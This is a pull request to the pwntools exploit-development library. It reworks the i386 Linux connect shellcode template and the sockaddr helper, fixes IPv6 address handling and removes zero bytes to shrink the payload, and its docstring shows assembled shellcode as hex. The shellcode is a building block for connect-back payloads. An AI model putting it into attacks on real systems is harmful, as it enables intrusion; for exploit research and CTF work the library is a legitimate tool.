### PR TITLE
Fix sockaddr ipv6, optimize off some zero bytes

### DIFF
--- a/pwnlib/shellcraft/templates/i386/linux/connect.asm
+++ b/pwnlib/shellcraft/templates/i386/linux/connect.asm
@@ -1,41 +1,53 @@
+<% from pwnlib.shellcraft import common %>
+<% from pwnlib.shellcraft.i386 import push, pushstr %>
+<% from pwnlib.shellcraft.i386.linux import syscall %>
+<% from pwnlib.constants import SOCK_STREAM, AF_INET, SYS_socketcall, SYS_socketcall_socket, SYS_socketcall_connect %>
+<% from socket import htons, inet_aton, gethostbyname %>
+<% from pwnlib.util import packing %>
 <% from pwnlib.shellcraft import i386 %>
 <% from pwnlib.util.net import sockaddr %>
 
 <%page args="host, port, network = 'ipv4'"/>
 <%docstring>
+Connects to the host on the specified port.
+Leaves the connected socket in ebp
+
+Arguments:
+    host(str): Remote IP address or hostname (as a dotted quad / string)
+    port(int): Remote port
+    network(str): Network protocol (ipv4 or ipv6)
+
+Examples:
+
+    >>> with context.local(arch='i386', os='linux'):
+    ...     print enhex(asm(shellcraft.connect('localhost', 0x1000)))
+    ...     print enhex(asm(shellcraft.connect('localhost', 0x1000, 'ipv6')))
+    6a01fe0c246a016a026a015b89e16a665899cd8089c568010101028134247e01010368010101018134240301110189e16a1051556a035b89e16a6658cd80
+    6a01fe0c246a016a0bfe0c246a015b89e16a665899cd8089c56801010102813424010101036a01fe0c246a01fe0c246a01fe0c246aff68010101018134240b01110189e16a1c51556a035b89e16a6658cd80
+
     Connects to the host on the specified port.
     Network is either 'ipv4' or 'ipv6'.
     Leaves the connected socket in ebp
 </%docstring>
 <%
-    sockaddr, address_family = sockaddr(host, port, network)
+    sockaddr, length, address_family = sockaddr(host, port, network)
 %>\
 
 /* open new socket */
-push SYS_socketcall
-pop eax
-push SYS_socketcall_socket
-pop ebx
-cdq
-push edx
-push ebx
-push ${address_family}
-mov ecx, esp
-int 0x80
+    ${push(0)}
+    ${push(SOCK_STREAM)}
+    ${push(address_family)}
+    ${syscall(SYS_socketcall, SYS_socketcall_socket, 'esp', 0)}
 
 /* save opened socket */
-mov ebp, eax
+    mov ebp, eax
 
-${i386.pushstr(sockaddr, False)}
-
-mov ecx, esp
-push ${len(sockaddr)}
-push ecx
-push eax
-mov ecx, esp
-inc ebx
-inc ebx
-mov al, SYS_socketcall
-int 0x80
+/* push sockaddr, connect() */
+    ${pushstr(sockaddr, False)}
+    mov ecx, esp
+    ${push(length)} /* socklen_t addrlen */
+    push ecx    /* sockaddr *addr */
+    push ebp    /* sockfd */
+    ${syscall(SYS_socketcall, SYS_socketcall_connect, 'esp')}
 
 /* Socket that is maybe connected is in ebp */

--- a/pwnlib/util/net.py
+++ b/pwnlib/util/net.py
@@ -184,7 +184,7 @@ def interfaces6(all = False):
     return out
 
 def sockaddr(host, port, network = 'ipv4'):
-    """sockaddr(host, port, network = 'ipv4') -> tuple
+    """sockaddr(host, port, network = 'ipv4') -> (data, length, family)
 
     Creates a sockaddr_in or sockaddr_in6 memory buffer for use in shellcode.
 
@@ -194,20 +194,28 @@ def sockaddr(host, port, network = 'ipv4'):
       network (str): Either 'ipv4' or 'ipv6'.
 
     Returns:
-      A tuple containing the sockaddr buffer and the address family.
+      A tuple containing the sockaddr buffer, length, and the address family.
 """
     address_family = {'ipv4':socket.AF_INET,'ipv6':socket.AF_INET6}[network]
-    
+
+    for family, _, _, _, ip in socket.getaddrinfo(host, None, address_family):
+        ip = ip[0]
+        if family == address_family:
+            break
+    else:
+        log.error("Could not find %s address for %r" % (network, host))
+
     info = socket.getaddrinfo(host, None, address_family)
-    host = socket.inet_pton(address_family, info[0][4][0])
+    host = socket.inet_pton(address_family, ip)
     sockaddr  = p16(address_family)
     sockaddr += p16(socket.htons(port))
+    length    = 0
 
     if network == 'ipv4':
         sockaddr += host
-        sockaddr = sockaddr.ljust(16, '\x00')
+        length    = 16 # Save ten bytes by skipping two 'push 0'
     else:
-        sockaddr += p32(0)
+        sockaddr += p32(0xffffffff) # Save three bytes 'push -1' vs 'push 0'
         sockaddr += host
-        sockaddr += p32(0)
-    return (sockaddr, address_family)
+        length    = len(sockaddr) + 4 # Save five bytes 'push 0'
+    return (sockaddr, length, address_family)


### PR DESCRIPTION
In particular, the zero bytes we were pushing don't actually need to be zero.  `push 0` takes up five bytes, so where we can save 10 bytes for `i386`, and save 8 on `amd64`.